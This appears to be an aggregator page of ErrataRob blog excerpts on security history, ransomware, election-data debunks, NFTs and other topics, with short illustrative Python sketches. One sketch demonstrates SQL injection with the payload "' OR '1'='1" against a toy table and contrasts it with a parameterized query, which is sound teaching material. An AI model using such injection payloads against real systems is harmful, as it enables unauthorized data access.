What's new around the internet


Src Date (GMT) Title Description Tags Stories Notes
ErrataRob 2023-01-25 16:09:34 I'm still bitter about Slammer (direct link)

Today is the 20th anniversary of the Slammer worm. I'm still angry over it, so I thought I'd write up my anger. This post will be of interest to nobody, it's just me venting my bitterness and get off my lawn!!

Back in the day, I wrote "BlackICE", an intrusion detection and prevention system that ran as both a desktop version and a network appliance. Most cybersec people from that time remember it as the desktop version, but the bulk of our sales came from the network appliance. The network appliance competed against other IDSs at the time, such as Snort, an open-source product. For much of the cybersec industry, IDS was Snort -- they had no knowledge of how intrusion-detection would work other than this product, because it was open-source.

My intrusion-detection technology was radically different. The thing that makes me angry is that I couldn't explain the differences to the community because they weren't technical enough. When Slammer hit, Snort and Snort-like products failed. Mine succeeded extremely well. Yet, I didn't get the credit for this.

The first difference is that I used a custom poll-mode driver instead of interrupts. This is now the norm in the industry, such as with Linux NAPI drivers. The problem with interrupts is that a computer could handle fewer than 50,000 interrupts-per-second. If network traffic arrived faster than this, then the computer would hang, spending all its time in the interrupt handler doing no other useful work. Turning off interrupts and instead polling for packets prevents this problem. The cost is that if the computer isn't heavily loaded by network traffic, then polling wastes CPU and electrical power. Linux NAPI drivers switch between the two: interrupts when traffic is light and polling when traffic is heavy.

The consequence is that a typical machine of the time (dual Pentium IIIs) could handle 2 million packets-per-second running my software, far better than the 50,000 packets-per-second of the competitors. When Slammer hit, it filled a 1-gbps Ethernet with 300,000 packets-per-second. As a consequence, pretty much all other IDS products fell over. Those that survived were attached to slower links -- 100-mbps was still common at the time.

An industry luminary even gave a presentation at BlackHat saying that my claimed performance (2 million packets-per-second) was impossible, because everyone knew that computers couldn't handle traffic that fast. I couldn't combat that, even by explaining with very small words "but we disable interrupts".

Now this is the norm. All network drivers are written with polling in mind. Specialized drivers like PF_RING and DPDK do even better. Network appliances are now written using these things. Now you'd expect something like Snort to keep up and not get overloaded with interrupts. What makes me bitter is that back then, this was inexplicable magic. I wrote an article in PoC||GTFO 0x15 that shows how my portscanner masscan uses this driver, if you want more info.

The second difference with my product was how signatures were written. Everyone else used signatures that triggered on pattern-matching. Instead, my technology included protocol-analysis, code that parsed more than 100 protocols. The difference is that when there is an exploit of a buffer-overflow vulnerability, pattern-matching searched for patterns unique to the exploit. In my case, we'd measure the length of the buffer, triggering when it exceeded a certain length, finding any attempt to attack the vulnerability.

The reason we could do this was through the use of state-machine parsers. Such analysis was considered heavy-weight and slow, which is why others avoided it. In fact, state-machines are faster than pattern-matching, many times faster. Better and faster. Such parsers are no

Tags: Vulnerability, Guideline ★★
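To make the length-based approach concrete, here is a minimal Python sketch of a state-machine detector that alerts on field length rather than on exploit bytes. It is purely illustrative: a toy protocol with made-up start/end markers and a made-up 128-byte limit, not BlackICE's actual code.

```python
# Minimal sketch of length-based, state-machine detection (toy protocol,
# not BlackICE's actual code). Instead of pattern-matching exploit bytes,
# the parser tracks how long a protocol field is; any overflow attempt
# trips it, regardless of what payload the exploit carries.

SAFE_LIMIT = 128  # hypothetical maximum legal field length

def make_detector(limit=SAFE_LIMIT):
    state = {"in_field": False, "field_len": 0}

    def feed(byte):
        """Consume one byte of the toy protocol; return True on alert."""
        if not state["in_field"]:
            if byte == 0x01:              # toy 'field start' marker
                state["in_field"] = True
                state["field_len"] = 0
            return False
        if byte == 0x00:                  # toy 'field end' marker
            state["in_field"] = False
            return False
        state["field_len"] += 1
        # Alert on length, not content: catches every exploit variant.
        return state["field_len"] > limit

    return feed

detector = make_detector()
packet = bytes([0x01]) + b"A" * 200 + bytes([0x00])  # oversized field
print(any(detector(b) for b in packet))              # True -> alert
```

Because the detector only advances a small state machine per byte, it does constant work per packet, which is the "faster than pattern-matching" property described above.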
ErrataRob 2022-10-23 16:05:58 The RISC Deprogrammer (direct link)

I should write up a larger technical document on this, but in the meantime here is this short(-ish) blogpost. Everything you know about RISC is wrong. It's some weird nerd cult. Techies frequently mention RISC in conversation, with other techies nodding their heads in agreement, but it's all wrong. Somehow everyone has been mind-controlled to believe in wrong concepts. An example is this recent blogpost which starts out saying that "RISC is a set of design principles". No, it wasn't. Let's start from this sort of viewpoint to discuss this odd cult.

What is RISC?

Because of the march of Moore's Law, every year more and more parts of a computer could be included on a single chip. When chip densities reached the point where we could almost fit an entire computer on a chip, designers made tradeoffs, discarding unimportant stuff to make the fit happen. They decided what needed to be included, what needed to change, and what needed to be discarded. RISC is a set of creative tradeoffs, meaningful at the time (early 1980s), but which were meaningless by the late 1990s.

The interesting part of CPU evolution is the stretch from 1964, with IBM's System/360 mainframe, to 2007, with Apple's iPhone. The issue was a 32-bit core with memory-protection, allowing isolation among different programs, with virtual memory. These were real computers, from the modern perspective: real computers have at least 32 bits and an MMU (memory management unit).

The year 1975 saw the release of the Intel 8080 and MOS 6502, but these were 8-bit systems without memory protection. This was the point of Moore's Law where we could get a useful CPU onto a single chip. In 1977, DEC released its VAX minicomputer, with a 32-bit CPU and MMU. Real computing had moved from insanely expensive mainframes filling entire rooms to less expensive devices that merely filled a rack. But the VAX was way too big to fit onto a chip at this time.

The really interesting evolution of real computing happened in 1980 with Motorola's 68000 (aka. 68k) processor, essentially the first microprocessor that supported real computing. But this comes with caveats. Making a microprocessor required creative work to decide what wasn't included. In the case of the 68k, it had only a 16-bit ALU. This meant adding two 32-bit registers required passing them twice through the ALU, adding each half separately. Because of this, many call the 68k a 16-bit rather than a 32-bit microprocessor.

More importantly, only the lower 24 bits of the registers were valid for memory addresses. Since it's memory addressing that makes a real computer "real", this is the more important measure. But 24 bits allows for 16 megabytes of memory, which is all that anybody could afford to include in a computer anyway. It was more than enough to run a real operating system like Unix. In contrast, 16-bit processors could only address 64 kilobytes of memory, and weren't really practical for real computing.

The 68k didn't come with an MMU, but it allowed an extra MMU chip. Thus, the early 1980s saw an explosion of workstations and servers consisting of a 68k and an MMU. The most famous was Sun Microsystems, launched in 1982, with their own custom-designed MMU chip. Sun and its competitors transformed the industry running Unix. Many point to IBM's PC from 1981 as the transformative moment in computer history, but those were non-real 16-bit systems that struggled with more than 64k of memory. IBM PC computers wouldn't become real until 1993 with Microsoft's Windows NT, supporting full 32 bits, memory-protection, and pre-emptive multitasking. But except for Windows itself, the rest of computing is dominated by the Unix heritage. The phone in your hand, whether Android or iPhone, is a Unix computer

Tags: Guideline, Heritage
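As an illustration of the 16-bit-ALU caveat above, here is a toy Python sketch of how a 32-bit addition decomposes into two 16-bit ALU passes with a carry in between. It demonstrates the arithmetic only; it is not actual 68k microcode.

```python
# Illustrative sketch (not actual 68k microcode): adding two 32-bit
# values on a 16-bit ALU takes two passes, the low halves first, then
# the high halves plus the carry; hence some call the 68k "16-bit".

def add32_on_16bit_alu(a, b):
    lo = (a & 0xFFFF) + (b & 0xFFFF)        # first ALU pass: low halves
    carry = lo >> 16                        # carry out of the low half
    hi = (a >> 16) + (b >> 16) + carry      # second ALU pass: high halves
    return ((hi << 16) | (lo & 0xFFFF)) & 0xFFFFFFFF

print(hex(add32_on_16bit_alu(0x0001FFFF, 0x00000001)))  # 0x20000
```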
ErrataRob 2022-07-03 19:02:22 DS620slim tiny home server (direct link)

In this blogpost, I describe the Synology DS620slim. Mostly these are notes for myself, so when I need to replace something in the future, I can remember how I built the system. It's a "NAS" (network attached storage) server that has six hot-swappable bays for 2.5 inch laptop drives. That's right, laptop 2.5 inch drives. It makes this a tiny server that you can hold in your hand.

The purpose of a NAS is reliable storage. All disk drives eventually fail. If you stick a USB external drive on your desktop for backups, it'll eventually crash, losing any data on it. A failure is unlikely tomorrow, but a spinning disk will almost certainly fail some time in the next 10 years. If you want to keep things, like photos, for the rest of your life, you need to do something different.

The solution is RAID, an array of redundant disks such that when one fails (or even two), you don't lose any data. You simply buy a new disk to replace the failed one and keep going. With occasional replacements (as failures happen) it can last decades. My older NAS is 10 years old and I've replaced all the disks, one slot replaced twice.

This can be expensive. A NAS requires a separate box in addition to lots of drives. In my case, I'm spending $1500 for 18 terabytes of disk space that would cost only $400 as an external USB drive. But amortized over the expected 10+ year lifespan, I'm paying $15/month for this home system.

This unit is not just disk drives but also a server. Spending $500 just for a box to hold the drives is a bit expensive, but the advantage is that it's also a server that's powered on all the time. I can set up tasks to run on a regular basis that would break if I tried to regularly run them on a laptop or desktop computer.

There are lots of do-it-yourself solutions (like the Radxa Taco carrier board for a Raspberry Pi CM4 running Linux), but I'm choosing this solution because I want something that just works without any hassle, that's configured for exactly what I need. For example, eventually a disk will fail and I'll have to replace it, and I know now that this will be effortless when it happens in the future, without having to relearn some arcane Linux commands that I forgot years ago.

Despite this, I'm a geek who obsesses about things, so I'm still going to do possibly unnecessary things, like upgrading hardware: memory, network, and fan for an optimized system. Here are all the components of my system:

$500 - DS620slim unit
$1000 - 6x Seagate Barracuda 5TB 2.5 inch laptop drives (ST5000LM000)
$100 - 2x Crucial 8GB DDR3 SODIMMs (CT2K102464BF186D)
$30 - 2.5gbps Ethernet USB adapter (CableCreation B07VNFLTLD)
$15 - Noctua NF-A8 ULN ultra-silent fan
$360 - WD Elements 18TB USB drive (WDBWLG0180HBK-NESN)

Tags: Ransomware, Guideline
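As a side note on how RAID survives a failed disk, here is a toy Python demonstration of single-parity (RAID-5 style) recovery using XOR. The two-byte "disks" are made-up values, and real arrays (including the dual-redundancy setups that tolerate two failures, as mentioned above) use more elaborate schemes; this sketches the principle only.

```python
# Toy demonstration of RAID-style XOR parity (single parity, RAID-5
# style). Losing any one "disk" is recoverable from the survivors.

from functools import reduce

disks = [b"\x11\x22", b"\x33\x44", b"\x55\x66"]          # data "disks"
parity = bytes(reduce(lambda x, y: x ^ y, col) for col in zip(*disks))

# Disk 1 dies; rebuild it by XOR-ing the survivors with the parity.
survivors = [disks[0], disks[2], parity]
rebuilt = bytes(reduce(lambda x, y: x ^ y, col) for col in zip(*survivors))
assert rebuilt == disks[1]
print(rebuilt.hex())  # 3344
```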
ErrataRob 2021-10-24 19:46:46 Review: Dune (2021) (direct link)

One of the most important classic sci-fi stories is the book "Dune" by Frank Herbert. It was recently made into a movie. I thought I'd write a quick review. The summary is this: just read the book. It's a classic for a good reason, and you'll be missing a lot by not reading it.

But the Dune (2021) movie is very good. The most important thing to know is to see it in IMAX. IMAX is this huge screen technology that partly wraps around the viewer, accompanied by huge speakers that overwhelm you with sound. If you watch it in some other format, what was visually stunning becomes merely very pretty.

This is Villeneuve's trademark, which you can see in his other works, like his sequel to Blade Runner. The purpose is to marvel at the visuals in every scene. The storytelling is just enough to hold the visuals together. I mean, he also seems to do a good job with the storytelling, but it's just not the reason to go see the movie. (I can't tell -- I've read the book, so I see the story differently than those of you who haven't.)

Beyond the story and visuals, many of the actors' performances were phenomenal. Javier Bardem's "Stilgar" character steals his scenes. Stellan Skarsgård exudes evil. The two character actors playing the mentats were each perfect. I found the lead character (Timothée Chalamet) a bit annoying, but simply because he is at this point in the story.

Villeneuve splits the book into two parts. This movie is only the first part. This presents a problem, because up until this point, the main character is just responding to events, not yet the hero who drives the events. It doesn't fit into the traditional Hollywood accounting model. I really want to see the second film even if the first part, released in the post-pandemic turmoil of the movie industry, doesn't perform well at the box office.

In short, if you haven't read the books, I'm not sure how well you'll follow the storytelling. But the visuals (seen at IMAX scale) and the characters are so great that I'm pretty sure most people will enjoy the movie. And go see it on IMAX in order to get the second movie made!!

Tags: Guideline
ErrataRob 2021-10-13 23:33:07 Fact check: that "forensics" of the Mesa image is crazy (direct link)

Tina Peters, the elections clerk from Mesa County (Colorado), went rogue, creating a "disk-image" of the election server and posting that image to the public Internet. Conspiracy theorists have been analyzing the disk-image trying to find anomalies supporting their conspiracy-theories. A recent example is this "forensics" report. In this blogpost, I debunk that report.

I suppose calling somebody a "conspiracy theorist" is insulting, but there are three objective ways we can identify them as such.

The first is when they use the logic "everything we can't explain is proof of the conspiracy". In other words, since there's no other rational explanation, the only remaining explanation is the conspiracy-theory. But there can be other possible explanations -- just ones unknown to the person because they aren't smart enough to understand them. We see that here: the person writing this report doesn't understand some basic concepts, like "airgapped" networks.

This leads to the second way to recognize a conspiracy-theory: when it demands this one thing that'll clear things up. Here, it's demanding that a manual audit/recount of Mesa County be performed. But it won't satisfy them. The Maricopa audit in neighboring Arizona, whose recount found no fraud, didn't clear anything up -- it just found more anomalies demanding more explanation. It's like Obama's birth certificate. The reason he ignored demands to show it was that, first, there was no serious question (even if born in Kenya, he'd still be a natural-born citizen -- just like how Cruz was born in Canada and McCain in Panama), and second, showing the birth certificate wouldn't change anything at all, as they'd just claim it was fake. There is no possibility of showing a birth certificate that can be proven isn't fake.

The third way to objectively identify a conspiracy theory is when they repeat objectively crazy things. In this case, they keep demanding that the 2020 election be "decertified". That's not a thing. There is no regulation or law where that can happen. The most you can hope for is to use this information to prosecute the fraudster, prosecute the elections clerk who didn't follow procedure, or convince legislators to change the rules for the next election. But there's just no way to change the results of the last election even if widespread fraud is now proven.

The document makes 6 individual claims. Let's debunk them one by one.

#1 Data Integrity Violation

The report tracks some logs on how some votes were counted. It concludes: "If the reasons behind these findings cannot be adequately explained, then the county's election results are indeterminate and must be decertified."

This neatly demonstrates two conditions I cited above. The analyst can't explain the anomaly not because something bad happened, but because they don't understand how Dominion's voting software works. This demand for an explanation is a common attribute of conspiracy theories -- the ignorant keep finding things they don't understand and demand somebody else explain them. Secondly, there's the claim that the election results must be "decertified". It's something that Trump and his supporters believe is a thing, that somehow the courts will overturn the past election and reinstate Trump. This isn't a rational claim. It's not how the courts or the law or the Constitution works.

#2 Intentional purging of Log Files

This is the issue that convinced Tina Peters to go rogue: the normal Dominion software update gets rid of all the old system-log files. She leaked two disk-images, before and after the update, to show the disappearance of system-logs. She believes this violates the law demanding that "election records" be preserved. She claims because o

Tags: Guideline
ErrataRob 2021-09-21 18:01:25 That Alfa-Trump Sussman indictment (direct link)

Five years ago, online magazine Slate broke a story about how DNS packets showed secret communications between Alfa Bank in Russia and the Trump Organization, proving a link that Trump denied. I was the only prominent tech expert who debunked this as just a conspiracy-theory[*][*][*]. Last week, I was vindicated by the indictment of a lawyer involved, a Michael Sussman. It tells a story of where this data came from, and some problems with it.

But we should first avoid reading too much into this indictment. It cherry-picks data supporting its argument while excluding anything that disagrees with it. We see chat messages expressing doubt in the DNS data. If chat messages existed expressing confidence in the data, we wouldn't see them in the indictment. In addition, the indictment tries to make strong ties to the Hillary campaign and the Steele Dossier, but ultimately, it's weak. It looks to me like an outsider trying to ingratiate themselves with the Hillary campaign rather than being part of a grand Clinton-led conspiracy against Trump.

With these caveats, we do see some important things about where the data came from. We see how Tech-Executive-1 used his position at cyber-security companies to search private data (namely, private DNS logs) for anything that might link Trump to somebody nefarious, including Russian banks. In other words, a link between Trump and Alfa Bank wasn't something they accidentally found, it was one of the many thousands of links they looked for.

Such a technique has long been known as a problem in science. If you cast the net wide enough, you are sure to find things that would otherwise be statistically unlikely. In other words, if you do hundreds of tests of hydroxychloroquine or ivermectin on Covid-19, you are sure to find results so statistically unlikely that they wouldn't happen more than 1% of the time. If you search world-wide DNS logs, you are certain to find weird anomalies that you can't explain. Unexplained computer anomalies happen all the time, as every user of computers can tell you.

We've seen from the start that the data was highly manipulated. It's likely that the data is real, that the DNS requests actually happened, but at the same time, it's been stripped of everything that might cast doubt on it. In this indictment we see why: before the data was found, the purpose was to smear Trump. The finders of the data don't want people to come to the best explanation, they want only explanations that hurt Trump.

Trump had no control over the domain in question, trump-email.com. Instead, it was created by a hotel marketing firm they hired, Cendyne. It's Cendyne who put Trump's name in the domain. A broader collection of DNS information including Cendyne's other clients would show whether this was normal or not. In other words, a possible explanation of the data, hints of a Trump-Alfa connection, has always been the dishonesty of those who collected it. The above indictment confirms they were at this level of dishonesty. It doesn't mean the DNS requests didn't happen, but that their anomalous nature can be created by deletion of explanatory data.

Lastly, we see in this indictment the problem with "experts".

Tags: Guideline
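A quick way to see the "cast the net wide enough" problem is a simulation. The numbers below are assumptions for illustration (5,000 links searched, anomalies defined at the 1% level), not figures from the indictment: even when every link is pure noise, dozens of "statistically unlikely" anomalies turn up.

```python
# Toy illustration of the multiple-comparisons problem: test thousands
# of "links" that are all pure noise, and p < 0.01 anomalies still
# appear, simply because so many tests were run.

import random

random.seed(1)
TESTS = 5000        # hypothetical number of links searched
P_ANOMALY = 0.01    # how "statistically unlikely" an anomaly is

hits = sum(random.random() < P_ANOMALY for _ in range(TESTS))
print(f"{hits} 'unexplainable' anomalies found in pure noise")
# With 5000 tests you expect around 50 hits even though nothing is there.
```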
ErrataRob 2021-07-14 20:49:05 Ransomware: Quis custodiet ipsos custodes (direct link)

Many claim that "ransomware" is due to cybersecurity failures. That's not really true. We are adequately protecting users and computers. The failure is in the inability of cybersecurity guardians to protect themselves. Ransomware doesn't make the news when it only accesses the files normal users have access to. The big ransomware news events happened because ransomware elevated itself to "administrator" over the network, giving it access to all files, including online backups.

Generic improvements in cybersecurity will help only a little, because they don't specifically address this problem. Likewise, blaming ransomware on how it breached perimeter defenses (phishing, patches, password reuse) will only produce marginal improvements. Ransomware solutions need to instead focus on the typical human-operated ransomware killchain, identify how attackers typically achieve "administrator" credentials, and fix those problems. In particular, large organizations need to redesign how they handle Windows "domains" and how they "segment" networks.

I read a lot of lazy op-eds on ransomware. Most of them claim that the problem is due to some sort of moral weakness (laziness, stupidity, greed, slovenliness, lust). They suggest things like "taking cybersecurity more seriously" or "doing better at basic cyber hygiene". These are "unfalsifiable" -- things that nobody would disagree with, meaning they are things the speaker doesn't really have to defend. They don't rest upon technical authority but moral authority: anybody, regardless of technical qualifications, can have an opinion on ransomware as long as they phrase it in such terms.

Another flaw of these "unfalsifiable" solutions is that they are not measurable. There's no standard definition for "best practices" or "basic cyber hygiene", so there's no way to tell if you aren't already doing such things, or the gap you need to overcome to reach this standard. Worse, some people point to the "NIST Cybersecurity Framework" as the "basics" -- but that's a framework for all cybersecurity practices. In other words, anything short of doing everything possible is considered a failure to follow the basics.

In this post, I try to focus on specifics, while at the same time making sure things are broadly applicable. It's detailed enough that people will disagree with my solutions.

The thesis of this blogpost is that we are failing to protect "administrative" accounts. The big ransomware attacks happen because the hackers got administrative control over the network, usually the Windows domain admin. It's with administrative control that they are able to cause such devastation, able to reach all the files in the network, while also being able to delete backups.

The Kaseya attacks highlight this particularly well. The company produces a product that is in turn used by "Managed Service Providers" (MSPs) to administer the security of small and medium-sized businesses. Hackers found and exploited a vulnerability in the product, which gave them administrative control over 1000 small and medium-sized businesses around the world.

The underlying problems start with the way their software gives indiscriminate administrative access over computers. Then, this software was written using standard software techniques, meaning with the standard vulnerabilities that most software has (such as "SQL injection"). It wasn't written in the paranoid, careful way that you'd hope for software that poses this much danger.

A good analogy is airplanes. A common joke refers to the "black box" flight-recorders that survive airplane crashes, suggesting that maybe we should make the entire airplane out of that material. The reason we can't is that the airplane would be too heavy to fly. The same is true of software: airplane software is written with extreme paranoia, knowing that bugs can l

Tags: Ransomware, Vulnerability, Guideline
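For readers unfamiliar with the bug class named above, here is a generic SQL-injection illustration in Python using the standard-library sqlite3 module. The table and payload are invented for the example, and this is not Kaseya's actual code; it contrasts splicing user input into query text with a parameterized query.

```python
# Generic illustration of the "SQL injection" bug class (toy schema,
# not Kaseya's code). The unsafe version splices user input into the
# SQL itself; the safe version passes it as a separate parameter.

import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
db.execute("INSERT INTO users VALUES ('alice', 1)")

user_input = "' OR '1'='1"   # classic injection payload

# Unsafe: attacker-controlled text becomes part of the query logic.
unsafe = f"SELECT * FROM users WHERE name = '{user_input}'"
print(db.execute(unsafe).fetchall())               # returns every row

# Safe: the driver keeps the value separate from the query text.
safe = "SELECT * FROM users WHERE name = ?"
print(db.execute(safe, (user_input,)).fetchall())  # returns nothing
```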
ErrataRob 2021-04-29 04:15:50 Anatomy of how you get pwned (direct link)

Today, somebody had a problem: they kept seeing a popup on their screen, an obvious scam trying to sell them McAfee anti-virus. Where was this coming from? In this blogpost, I follow this rabbit hole on down. It starts with "search engine optimization" links and leads to an entire industry of tricks, scams, exploiting popups, trying to infect your machine with viruses, and stealing emails or credit card numbers.

Evidence of the attack first appeared with occasional popups like the following. The popup isn't part of any webpage. This is obviously a trick. But from where? How did it "get on the machine"?

There are lots of possible answers. But the most obvious answer (to most people), that your machine is infected with a virus, is likely wrong. Viruses are generally silent, doing evil things in the background. When you see something like this, you aren't infected ... yet. Instead, things popping up with warnings is almost entirely due to evil websites. But that's confusing, since this popup doesn't appear within a web page. It's off to one side of the screen, nowhere near the web browser.

Moreover, we spent some time diagnosing this. We restarted the web browser in "troubleshooting mode" with all extensions disabled and went to a clean website like Twitter. The popup still kept happening. As it turns out, he had another window with Firefox running under a different profile. So while he cleaned out everything in this one profile, he wasn't aware the other one was still running. This happens a lot in investigations. We first rule out the obvious things, and then struggle to find the less obvious explanation -- when it was the obvious thing all along.

In this case, the reason the popup wasn't attached to a browser window is because it's a new type of popup notification that's supposed to act more like an app and less like a web page. It has a hidden web page underneath called a "service worker", so the popups keep happening when you think the webpage is closed. Once we figured out the mistake of the other Firefox profile, we quickly tracked this down and saw that indeed, it was in the Notification list with Permissions set to Allow. Simply changing this solved the problem.

Note that the above picture of the popup has a little wheel in the lower right. We are taught not to click on dangerous things, so the user in this case was avoiding it. However, had the user clicked on it, it would have led him straight to the solution. Though, I can't recommend you click on such a thing and trust it, because that means in the future, malicious tricks will contain such safe-looking icons that aren't so safe.

Anyway, the next question is: which website did this come from? The answer is Google. In the news today was the story of the Michigan guys who tried to kidnap the governor. The user googled "attempted kidnap sentencing guidelines". This search produced a pa

Tags: Guideline
ErrataRob 2021-03-20 23:52:47 Deconstructing that $69million NFT (direct link)

"NFTs" have hit the mainstream news with the sale of an NFT-based digital artwork for $69 million. I thought I'd write up an explainer. Specifically, I deconstruct that huge purchase and show what actually was exchanged, down to the raw code. (The answer: almost nothing.) The reason for this post is that every other description of NFTs describes what they pretend to be. In this blogpost, I drill down on what they actually are. Note that this example is about "NFT artwork", the thing that's been in the news. There are other uses of NFTs, which work very differently than what's shown here.

tl;dr

I have a long bit of text explaining things. Here is the short form that allows you to drill down to the individual pieces:

Beeple created a piece of art in a file.
He created a hash that uniquely, and unhackably, identified that file.
He created a metadata file that included the hash of the artwork.
He created a hash of the metadata file.
He uploaded both files (metadata and artwork) to the IPFS darknet decentralized file-sharing service.
He created, or minted, a token governed by the MakersTokenV2 smart contract on the Ethereum blockchain.
Christies created an auction for this token.
The auction was concluded with a payment of $69 million worth of Ether cryptocurrency. However, nobody has been able to find this payment on the Ethereum blockchain; the money was probably transferred through some private means.
Beeple transferred the token to the winner, who transferred it again to this final Metakovan account.

Each of the links above allows you to drill down to exactly what's happening on the blockchain. The rest of this post discusses things in long form.

Why do I care?

Well, you don't. It makes you feel stupid that you haven't heard about it, when everyone is suddenly talking about it as if it's been a thing for a long time. But in reality, they didn't know what it was a month ago, either. Here is the Google Trends graph to prove this point -- interest has only exploded in the last couple months. The same applies to me. I've been aware of them (since the CryptoKitties craze from a couple years ago) but hadn't invested time reading source code until now. Much of this blogpost is written as notes as I discover for myself exactly what was purchased fo

Tags: Tool, Guideline
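To make the tl;dr concrete, here is a minimal Python sketch of the hash chain in steps 2 through 4. The artwork bytes are a stand-in and plain SHA-256 hex digests are used for illustration (IPFS actually uses multihash content IDs); the IPFS upload and minting steps are omitted.

```python
# Sketch of the hash chain from the tl;dr (illustrative values, not
# Beeple's actual files): hash the artwork, embed that hash in a
# metadata file, then hash the metadata.

import hashlib
import json

artwork = b"...raw bytes of the artwork file..."      # stand-in content
artwork_hash = hashlib.sha256(artwork).hexdigest()    # step 2

metadata = json.dumps({                               # step 3
    "name": "Everydays: The First 5000 Days",
    "artwork_hash": artwork_hash,
}).encode()

metadata_hash = hashlib.sha256(metadata).hexdigest()  # step 4
print(artwork_hash, metadata_hash, sep="\n")

# The on-chain token ultimately points at the metadata hash; changing
# one byte of the artwork changes both hashes, which is what makes the
# reference tamper-evident.
```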
ErrataRob 2021-02-27 00:03:27 Review: Perlroth's book on the cyberarms market (direct link)

New York Times reporter Nicole Perlroth has written a book on zero-days and nation-state hacking entitled "This Is How They Tell Me The World Ends". Here is my review.

I'm not sure what the book intends to be. The blurbs from the publisher imply a work of investigative journalism, in which case it's full of unforgivable factual errors. However, it reads more like a memoir, in which case errors are to be expected/forgivable, with content often from memory rather than rigorously fact-checked notes. But even with this more lenient interpretation, there are important flaws that should be pointed out. For example, the book claims the Saudis hacked Bezos with a zero-day; I claim that's bunk. The book claims zero-days are "God mode" compared to other hacking techniques; I claim they are no better than the alternatives, usually worse, and rarely used.

Tags: Ransomware, Guideline
ErrataRob 2020-12-09 15:25:45 The deal with DMCA 1201 reform (direct link)

There are two fights in Congress now against the DMCA, the "Digital Millennium Copyright Act". One is over Section 512, covering "takedowns" on the web. The other is over Section 1201, covering "reverse engineering", which weakens cybersecurity.

Even before digital computers, since the 1880s, an important principle of cybersecurity has been openness and transparency ("Kerckhoffs's Principle"). Only through making details public can security flaws be found, discussed, and fixed. This includes reverse-engineering to search for flaws.

Cybersecurity experts have long struggled against the ignorant who hold the naive belief that we should instead cover up information, so that evildoers cannot find and exploit flaws. Surely, they believe, giving just anybody access to critical details of our security weakens it. The ignorant have little faith in technology, that it can be made secure. They have more faith in government's ability to control information.

Technologists believe this information coverup hinders well-meaning people and protects the incompetent from embarrassment. When you hide information about how something works, you prevent people on your own side from discovering and fixing flaws. It also means that you can't hold anyone accountable for their security, since it's impossible to notice security flaws until after they've been exploited. At the same time, the information coverup does not do much to stop evildoers. Technology can work, it can be perfected, but only if we can search for flaws.

It seems counterintuitive that revealing your encryption algorithms to your enemy is the best way to secure them, but history has proven time and again that this is indeed true. Encryption algorithms your enemy cannot see are insecure. The same is true of the rest of cybersecurity. Today, I'm composing and posting this blogpost securely from a public WiFi hotspot because the technology is secure. It's secure because of two decades of security researchers finding flaws in WiFi, publishing them, and getting them fixed.

Yet in the year 1998, ignorance prevailed with the "Digital Millennium Copyright Act". Section 1201 makes reverse-engineering illegal. It attempts to secure copyright not through strong technological means, but by the heavy hand of government punishment. The law was not completely ignorant. It includes an exception allowing what it calls "security testing" -- in theory. But that exception does not work in practice, imposing too many conditions on such research to be workable.

The U.S. Copyright Office has authority under the law to add its own exemptions every 3 years. It has repeatedly added exceptions for security research, but the process is unsatisfactory. It's a protracted political battle every 3 years to get the exception back on the list, and each time it can change slightly. These exemptions are still less than what we want. This causes a chilling effect on permissible research. It would be better if such exceptions were put directly into the law.

You can understand the nature of the debate by looking at those on each side. Those lobbying for the exceptions are those trying to make technology more secure, such as Rapid7, Bugcrowd, Duo Security, Luta Security, and Hackerone. These organizations have no interest in violating copyright -- their only concern is cybersecurity, finding and fixing flaws.

The opposing side includes the copyright industry, as you'd expect, such as the "DVD" association, which doesn't want hackers breaking the DRM on DVDs. However, much of the opposing side has nothing to do with copyright as such. This notably includes the three major voting machine suppliers in the United States: Dominion Voting, ES&S, and Hart InterCivic. Security professionals have been pointing out security flaws in their equipment for the past several years. These vendors are explicitly trying to cover up their security flaws by using the law to silence critics. This goes back to the struggle mentioned at the top of this

Tags: Guideline
ErrataRob 2020-10-25 21:05:55 Why Biden: Principle over Party (direct link)

There exist many #NeverTrump Republicans who agree that while Trump would best achieve their Party's policies, he must nonetheless be opposed on Principle. The Principle in question isn't that Trump is a liar, a misogynist, a racist, or of low character (though all these are true). Instead, the Principle is that he's a populist autocrat who is eroding our liberal institutions ("liberal" as in the classic sense).

Countries don't fail when there's a leftward shift in government policies. Many prosperous, peaceful European countries are to the left of Biden. What makes prosperous countries fail is when civic institutions break down, when a party or dear leader starts ruling by decree, such as in the European countries of Russia or Hungary.

Our system of government is like football. While the teams (parties) compete vigorously against each other, they largely respect the rules of the game, both written and unwritten traditions. They respect each other -- while doing their best to win (according to the rules), they nonetheless shake hands at the end of the match, and agree that their opponents are legitimate. The rules of the sport we are playing are described in the Wikipedia page on "liberal democracy". Sports matches can be enjoyable even if you don't understand the rules. The same is true of liberal democracy: there's little civic education in the country, so most don't know the rules of the game. Most are unaware even that there are rules.

You see that in action with this concern over Trump conceding the election, his unwillingness to commit to a "peaceful transfer of power". His supporters widely believed this is a made-up controversy, a "principle" created on the spot as just another way to criticize Trump. But it's not a new principle. A "peaceful transfer of power" is the #1 bedrock principle from which everything else derives. It's the first way we measure whether a country is actually the "liberal democracy" it claims to be. For example, the fact that Putin has been in power for 20 years makes us doubt that Russia is really the "liberal democracy" it claims. The reason you haven't heard of it, the reason it isn't discussed much, is that it's so unthinkable that a politician would reject it the way Trump has.

The historic importance of this principle can be seen when you go back and read the concession speeches of Hillary, McCain, Gore, Bush Sr., and Carter: all of them stressed the legitimacy of their opponent's win, and a commitment to a peaceful transfer of power. (It goes back further than that, to the founding of our country, but I can't link every speech.) The following quote from Hillary's concession to Trump demonstrates this principle:

"But I still believe in America and I always will. And if you do, then we must accept this result and then look to the future. Donald Trump is going to be our president. We owe him an open mind and the chance to lead. Our constitutional democracy enshrines the peaceful transfer of power and we don't just respect that, we cherish it. It also enshrines other things; the rule of law, the principle that we are all equal in rights and dignity, freedom of worship and expression. We respect and cherish these values too and we must defend them."

If this were Trump's only failure, then we could excuse it and work around it. As long as he defended all

Tags: Guideline
ErrataRob 2020-10-14 19:34:25 Yes, we can validate leaked emails (direct link)

When emails leak, we can know whether they are authentic or forged. It's the first question we should ask of today's leak of emails of Hunter Biden. It has a definitive answer.

Today's emails have "cryptographic signatures" inside the metadata. Such signatures have been common for the past decade as one way of controlling spam, to verify the sender is who they claim to be. These signatures verify not only the sender, but also that the contents have not been altered. In other words, they authenticate the document, who sent it, and when it was sent.

